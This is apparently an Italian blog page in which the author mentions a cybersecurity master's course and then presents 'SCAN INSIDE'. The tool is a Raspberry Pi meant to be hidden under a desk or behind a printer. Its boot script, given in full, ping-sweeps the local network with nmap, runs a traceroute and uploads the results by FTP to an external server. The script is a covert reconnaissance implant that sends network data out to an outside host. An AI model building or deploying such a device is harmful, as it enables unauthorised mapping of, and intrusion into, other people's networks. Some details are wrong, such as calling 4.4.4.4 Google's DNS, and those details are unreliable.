Ho iniziato un nuovo corso, un Master in cybersecurity e data protection sviluppato da SinerVis in collaborazione con l'università Carolina Albasio. Il percorso è accreditato ufficialmente come master universitario ed è articolato nei moduli didattici che seguono:

Modulo 1 – Tipi di Attacco e le Vulnerabilità dei sistemi ICT
Modulo 2 – Risk Analysis e Risk Management
Modulo 3 – Incident Management
Modulo 4 – Autenticazione, Autorizzazione e Sicurezza Perimetrale
Modulo 5 – Progettazione e Governance della Sicurezza dell’Organizzazione
Modulo 6 – Normative sulla Sicurezza dei Sistemi ICT e sulla Protezione dei Dati


Sto collaborando all'implementazione di un nuovo software per la gestione del registro del trattamento dei dati.


SCAN INSIDE (1st hacking tool)

Testare la sicurezza di una rete oggi è fondamentale. E' un oggetto che sta nel palmo di una mano, non necessita di alimentazione esterna e può essere nascosto facilmente sotto una scrivania, dietro a una stampante, in una sala riunioni vuota... SCAN INSIDE è un Raspberry PI 3+ un Power Bank per cellulari. All'avvio lancia uno script che fa la scansione dell' IP, filtra la classe di rete e lancia una scansione degli host, infine fa un traceroute verso i DNS google, scrive i risultati in un file e lo trasmette via FTP su un sito esterno fornendoci una mappa chiara della rete.

nano /etc/init.d/rc.local e aggiungere ./home/pi/script.sh

Esempio di Script:


#!/bin/bash

str=`ifconfig -a |grep "inet.*netmask" |grep -v "127.0.0.1" | sed  "s/inet//" | sed "s/netmask.*//" | sed "s/\s*//"`

newstr=$(awk -F"." '{print $1"."$2"."$3""}'<<<$str)

prova2=".0/24"

prova=$newstr$prova2

nmap -sn $prova >> export.txt

traceroute -4 4.4.4.4 >> export.txt
echo "Done"

HOST='ftp.******.***'
USER='*****@*****.**'
PASSWD='*********'
FILE='export.txt'

ftp -n $HOST <<END_SCRIPT
quote USER $USER
quote PASS $PASSWD
cd ************.com
put $FILE
quit
END_SCRIPT
exit 0


SCARICA LA MIA APPLICAZIONE